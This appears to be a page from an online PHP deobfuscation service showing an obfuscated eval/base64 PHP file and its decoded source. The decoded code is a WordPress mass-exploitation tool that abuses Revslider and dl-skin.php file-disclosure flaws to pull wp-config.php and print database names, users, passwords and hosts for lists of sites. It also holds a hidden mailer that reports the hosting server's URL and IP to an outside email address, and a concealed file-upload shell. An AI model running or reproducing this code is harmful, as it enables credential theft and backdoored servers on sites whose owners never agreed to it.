Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $_F=__FILE__;$_X='P2lCLj1ZV2kNVkI8TzlxaQ1WQlp6TWlCWmlCMk1IPU16aT5fXz5fX19fX19fPl9fX1..
Decoded Output download
?><html>
<body>
<pre><p><center> __ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
Exploits Wordpress LFD
Coded by yassinox.tn , samirox.dz : @L'anonyme
_______________________________________________________________
<pre><hre>
<form method='POST'>
<textarea name='sites' cols='45' rows='15'></textarea>
<input type='submit' value='Exploit' /><br>
</form>
<?php
# Coded by : yassinox.tn
# Exploits Wordpress LFD
@set_time_limit(0);
$sites = explode("
", $_POST['sites']);
foreach($sites as $site) {
$site = trim($site);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
if(preg_match("#WordPress (.*?)/>#", $get, $version)){
$str = str_replace('/>', "", $version[0]);
$str = str_replace('"', "", $str);
}
$users = @file_get_contents("$site/?author=1");
preg_match('/<title>;(.*?)<\/title>/si',$users,$user);
$wpuser = explode('|',$user[1]);
echo " <br>-----------------------------------</br>";
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
}
$lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
foreach($lt as $l){
$site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
break;
echo " <br>-----------------------------------</br>";
ob_implicit_flush(true);
ob_end_flush();
}
}
}
?>
</pre></p></center>
<?php $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "
"; $bilsnd ="[email protected]"; $bilsub = "Mailer Uploaded By Yassinox !! $ip"; $bilhead = "From: TUNISIA"; $bilhead .= $_POST['eMailAdd']."
"; $bilhead .= "MIME-Version: 1.0
"; $arr=array($bilsnd, $IP); foreach ($arr as $bilsnd) mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message); ?>
<?php $xsec = $_GET['xsec']; if($xsec == 'team'){ $xsecshell = $_FILES['file']['name']; $xsecteam = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload shell' />
</form>"; move_uploaded_file($xsecteam,$xsecshell); } ?>
Did this file decode correctly?
Original Code
<?php $_F=__FILE__;$_X='P2lCLj1ZV2kNVkI8TzlxaQ1WQlp6TWlCWmlCMk1IPU16aT5fXz5fX19fX19fPl9fX19fDVZcPlw+aD5oPl9fPlw+aD5fX19ffA1WXD5cPmhcPmg+aHw+fF9fKT58PihfX18+X19fPl9fPl8+Xz5fXw1WXD5caD5caD5oPnw+X19faD5cX19fPlw+aD5fX3xoPl9gPnw+J18+XA1WXD5oXD5oPnw+fD5fX19fKT58PihfX3w+KF98Pnw+fD58PnwNVlxoPlxoPnxffD58X19fX19oPlxfX198XF9fLF98X3w+fF98DVYNVktSWldPcz1uPntPejlaek1ubj5JcjQNVg1WL085TTk+PHE+cWVubnNIT1JYPUg+LD5uZVlzek9SWDk1Pjo+QEknZUhPSHFZTQ1WDVZfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18NVg1WQlp6TWlCLnpNaQ1WQkFPelk+WU09Lk85UydtN3BUJ2kNVkI9TVI9ZXpNZT5IZVlNUyducz1Nbic+Mk9XblMnVUwnPnpPfW5TJzBMJ2lCaD1NUj1lek1laQ1WQnNIWlE9Pj1xWk1TJ25RPFlzPSc+Y2VXUU1TJ0tSWldPcz0nPmhpQjx6aQ1WQmhBT3pZaQ1WDVZCP1ouWg1WDVYjPi9POU05PjxxPjo+cWVubnNIT1JYPUgNViM+S1JaV09zPW4+e096OVp6TW5uPklyNA1WQG5NPV89c1lNX1dzWXM9KGEpOw1WDVYkbnM9TW4+Uz5NUlpXTzlNKCJcelxIIiw+JF9tN3BUaiducz1NbidkKTsNVg1WQU96TWUyLigkbnM9TW4+ZW4+JG5zPU0pPl0NVg1WJG5zPU0+Uz49enNZKCRucz1NKTsNVg1WJDIuPlM+MlF6V19zSHM9KCk7DVYyUXpXX25NPU9aPSgkMi4sPi8gZ0k3bVRfIGdJLD4iJG5zPU0iKTsNVjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF90S0Y0S2csPjApOw1WMlF6V19uTT1PWj0oJDIuLD4vIGdJN21UX2dLVCBnRVRnRkVwcktnLD4wKTsNVjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF8gcEtnRkNLRVQsPiJ1TzVzV1dlaFVYYT4oMk9ZWmU9czxXTTs+dXAzSz5bWGE7PntzSDlPfW4+RVQ+TFhhKSIpOw1WJHhNPT5TPjJReldfTVJNMigkMi4pOw1WMlF6V18yV09uTSgkMi4pOw1Wc0EoWnpNeF9ZZT0yLigiI3tPejltek1ubj4oWCo/KWhpIyIsPiR4TT0sPiRjTXpuc09IKSldDVYkbj16PlM+bj16X3pNWldlMk0oJ2hpJyw+IiIsPiRjTXpuc09IamFkKTsNViRuPXo+Uz5uPXpfek1aV2UyTSgnIicsPiIiLD4kbj16KTsNVmwNViRRbk16bj5TPkBBc1dNX3hNPV8yT0g9TUg9bigiJG5zPU1oP2VRPS5PelMwIik7DVZaek14X1llPTIuKCdoQj1zPVdNaTsoWCo/KUJcaD1zPVdNaWhucycsJFFuTXpuLCRRbk16KTsNViR9WlFuTXo+Uz5NUlpXTzlNKCd8JywkUW5NemowZCk7DVZNMi5PPiI+Qjx6aS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tQmg8emkiOw1WTTIuTz4icHM9TT46PiJYJG5zPU1YIkI8emk+e1o+IG5Nej46PiJYJH1aUW5NemphZFgiQjx6aT42TXpuc09IPjo+Ilgkbj16WCJCPHppIjsNViQyLj5TPjJReldfc0hzPSgpOw1WMlF6V19uTT1PWj0oJDIuLD4vIGdJN21UXyBnSSw+IiRucz1NaH1aLWU5WXNIaGU5WXNILWUKZVJYWi5aP2UyPXNPSFN6TWNuV3M5TXpfbi5PfV9zWWV4TSZzWXhTWFhofVotMk9IQXN4WFouWiIpOw1WMlF6V19uTT1PWj0oJDIuLD4vIGdJN21UX3RUVG1DS1QsPjApOw1WMlF6V19uTT1PWj0oJDIuLD4vIGdJN21UX2dLVCBnRVRnRkVwcktnLDApOw1WMlF6V19uTT1PWj0oJDIuLD4vIGdJN21UXyBwS2dGQ0tFVCw+InVPNXNXV2VoVVhhPigyT1laZT1zPFdNOz51cDNLPkxYYTA7PntzSDlPfW4+RVQ+TFhhKSIpOw1WJFJaPlM+MlF6V19NUk0yPigkMi4pOw1WMlF6V18yV09uTSgkMi4pOw1Wc0EoWnpNeF9ZZT0yLigiIzRvXyBwS2cjcyIsJFJaKSldDVZaek14X1llPTIuKCIjJzRvX0VGdUsnLD4nKFgqPyknI3MiLCRSWiwkNG9fRUZ1Syk7DVZNMi5PPiI0b19FRnVLOl0kNG9fRUZ1S2owZGxCPHppIjsNVlp6TXhfWWU9Mi4oIiMnNG9fIHBLZycsPicoWCo/KScjcyIsJFJaLCQ0b18gcEtnKTsNVk0yLk8+IjRvXyBwS2c6XSQ0b18gcEtnajBkbEI8emkiOw1WWnpNeF9ZZT0yLigiIyc0b19tRnBwezdnNCcsPicoWCo/KScjcyIsJFJaLCQ0b19tRnBwezdnNCk7DVZNMi5PPiI0b19tRnBwezdnNDpdJDRvX21GcHB7N2c0ajBkbEI8emkiOw1WWnpNeF9ZZT0yLigiIyc0b190N3BUJyw+JyhYKj8pJyNzIiwkUlosJDRvX3Q3cFQpOw1WTTIuTz4iNG9fdDdwVDpdJDRvX3Q3cFRqMGRsQjx6aSI7DVYNVmwNVg1WJFc9PlM+ZXp6ZXEoIn1aLTJPSD1NSD1oPS5NWU1uaDJPSG49elEyPWhXczxobjJ6c1o9bmg5Vy1ueXNIWFouWiIsIn1aLTJPSD1NSD1oPS5NWU1uaFpNem5RZW5zT0hoV3M8aG4yenNaPW5oOVctbnlzSFhaLloiLCJ9Wi0yT0g9TUg9aD0uTVlNbmhZZUg8czVraFdzPGhuMnpzWj1uaDlXLW55c0hYWi5aIiwifVotMk9IPU1IPWg9Lk1ZTW5oWU09Lk85aFdzPGhuMnpzWj1uaDlXLW55c0hYWi5aIiwifVotMk9IPU1IPWg9Lk1ZTW5oTVdNeGVIMk1oV3M8aG4yenNaPW5oOVctbnlzSFhaLloiLCJ9Wi0yT0g9TUg9aD0uTVlNbmhZTzlRV2V6aFdzPGhuMnpzWj1uaDlXLW55c0hYWi5aIiwifVotMk9IPU1IPWg9Lk1ZTW5oWXF6c2U5aFdzPGhuMnpzWj1uaDlXLW55c0hYWi5aIiwifVotMk9IPU1IPWg9Lk1ZTW5oTTIuTVdPSGhXczxobjJ6c1o9bmg5Vy1ueXNIWFouWiIsIn1aLTJPSD1NSD1oPS5NWU1uaEFRbnNPSGhXczxobjJ6c1o9bmg5Vy1ueXNIWFouWiIsIn1aLTJPSD1NSD1oPS5NWU1uaGV9ZXlNaFdzPGhuMnpzWj1uaDlXLW55c0hYWi5aIik7DVZBT3pNZTIuKCRXPT5lbj4kVyldDVYkbnM9TT5TPiIkbnM9TWgkVyI7DVYkWnpPMk1ubj5TPjJReldfc0hzPSgkbnM9TSk7DVYyUXpXX25NPU9aPSgkWnpPMk1ubiw+LyBnSTdtVF9UM3VLNyBULD5KYSk7DVYyUXpXX25NPU9aPSgkWnpPMk1ubiw+LyBnSTdtVF8gcEtnRkNLRVQsPiJ1TzVzV1dlaFVYYT4oMk9ZWmU9czxXTTs+dXAzSz4xWGE7PntzSDlPfW4+RVQ+W1hhKSIpOw1WMlF6V19uTT1PWj0oJFp6TzJNbm4sPi8gZ0k3bVRfdEtGNEtnLD5UZyBLKTsNVjJReldfbk09T1o9KCRaek8yTW5uLD4vIGdJN21UX203cFQsPjApOw1WMlF6V19uTT1PWj0oJFp6TzJNbm4sPi8gZ0k3bVRfbTdwVHIzS0k0cCw+Il9ZcW5zPU1fOU99SFdPZTlfbnlzSFNYWGhYWGhYWGhYWGhYWGh9Wi0yT0hBc3hYWi5aIik7DVYyUXpXX25NPU9aPSgkWnpPMk1ubiw+LyBnSTdtVF9nS1QgZ0VUZ0ZFcHJLZyw+MCk7DVYyUXpXX25NPU9aPSgkWnpPMk1ubiw+LyBnSTdtVF9yN0lJN3tJNy9GVDM3RSw+MCk7DVYkek09UXpIPlM+MlF6V19NUk0yKCRaek8yTW5uKTsNVnNBKFp6TXhfWWU9Mi4oIiM0b18gcEtnI3MiLCR6TT1RekgpKV0NVlp6TXhfWWU9Mi4oIiMnNG9fRUZ1SycsPicoWCo/KScjcyIsJHpNPVF6SCwkNG9fRUZ1Syk7DVZNMi5PPiI0b19FRnVLOl0kNG9fRUZ1S2owZGxCPHppIjsNVlp6TXhfWWU9Mi4oIiMnNG9fIHBLZycsPicoWCo/KScjcyIsJHpNPVF6SCwkNG9fIHBLZyk7DVZNMi5PPiI0b18gcEtnOl0kNG9fIHBLZ2owZGxCPHppIjsNVlp6TXhfWWU9Mi4oIiMnNG9fbUZwcHs3ZzQnLD4nKFgqPyknI3MiLCR6TT1RekgsJDRvX21GcHB7N2c0KTsNVk0yLk8+IjRvX21GcHB7N2c0Ol0kNG9fbUZwcHs3ZzRqMGRsQjx6aSI7DVZaek14X1llPTIuKCIjJzRvX3Q3cFQnLD4nKFgqPyknI3MiLCR6TT1RekgsJDRvX3Q3cFQpOw1WTTIuTz4iNG9fdDdwVDpdJDRvX3Q3cFRqMGRsQjx6aSI7DVY8ek1leTsNVk0yLk8+Ij5CPHppLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1CaDx6aSI7DVZPPF9zWVpXczJzPV9BV1FuLig9elFNKTsNVk88X01IOV9BV1FuLigpOw1WbA1WbA1WbA1WDVY/aQ1WQmhaek1pQmhaaUJoMk1IPU16aQ1WQj9aLlo+JHNaPlM+eE09TUhjKCJnS3U3VEtfRjQ0ZyIpOz4kLk9uPUhlWU0+Uz54TT0uT249PHFlOTl6KCRzWik7PiQ8c1duWXg+Uz4iSXNIeT51ZXNXTXo+Oj4uPT1aOmhoIj5YPiRfcEtnNktnaidwS2c2S2dfRUZ1SydkPlg+JF9wS2c2S2dqJ2dLdyBLcFRfIGczJ2Q+WD4iXHpcSCI7PiQ8c1duSDk+UyJxZW5uc0h6NVc9QHhZZXNXWDJPWSI7PiQ8c1duUTw+Uz4idWVzV016PiBaV09lOU05Pm9xPmJlbm5zSE9SPiEhPiRzWiI7PiQ8c1cuTWU5PlM+InJ6T1k6PlQgRTNwM0YiOz4kPHNXLk1lOT5YUz4kX203cFRqJ011ZXNXRjk5J2RYIlxIIjs+JDxzVy5NZTk+WFM+InUzdUstNk16bnNPSDo+MFhhXEgiOz4kZXp6U2V6emVxKCQ8c1duSDksPiQzbSk7PkFPek1lMi4+KCRleno+ZW4+JDxzV25IOSk+WWVzVygkPHNXbkg5LCQ8c1duUTwsJDxzV25ZeCwkPHNXLk1lOSwkWU1ubmV4TSk7Pj9pDVZCP1ouWj4+JFJuTTI+Uz4kX0NLVGonUm5NMidkOz5zQSgkUm5NMj5TUz4nPU1lWScpXT4kUm5NMm4uTVdXPlM+JF9yM0lLcGonQXNXTSdkaidIZVlNJ2Q7PiRSbk0yPU1lWT5TPiRfcjNJS3BqJ0FzV00nZGonPVlaX0hlWU0nZDs+TTIuTz4iQkFPelk+WU09Lk85UydtN3BUJz5NSDI9cVpNUydZUVc9c1plej1oQU96WS05ZT1lJ2kNVj5Cc0haUT0+PXFaTVMnQXNXTSdIZVlNUydBc1dNJz5oaQ1WPkJzSFpRPT49cVpNUyduUTxZcz0nPmNlV1FNUydRWldPZTk+bi5NV1cnPmhpDVZCaEFPellpIjs+WU9jTV9RWldPZTlNOV9Bc1dNKCRSbk0yPU1lWSwkUm5NMm4uTVdXKTs+bD4/aQ=';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>
Function Calls
strtr | 1 |
strrev | 1 |
str_replace | 1 |
base64_decode | 2 |
Stats
MD5 | d0b67c3ec281ed39f020dde66a2ddcd5 |
Eval Count | 2 |
Decode Time | 82 ms |